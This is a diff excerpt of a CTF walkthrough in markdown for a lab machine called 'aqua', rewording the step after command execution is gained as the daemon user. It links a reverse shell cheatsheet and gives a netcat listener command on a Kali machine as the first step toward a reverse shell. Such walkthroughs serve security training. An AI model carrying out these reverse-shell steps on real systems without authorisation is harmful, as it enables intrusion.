bsamtleben/color-ctf-walkthroughs/machines/aqua/walkthrough.md

 uid=1(daemon) gid=1(daemon) groups=1(daemon)
 ```

 Cool!
 Looks like we can execute commands on the machine.
-The next step is to establish a reverse shell for an interactive experience.
-We can use this [Reverse Shell Cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md).
+Our next step is to establish a proper reverse shell.
+You can use this [Reverse Shell Cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md).

-Establishing the reverse shell happens in two steps:
+Establishing a reverse shell requires two steps:

 1. Start a listener on your local Kali Linux machine on some port:  `nc -lnvp 4242`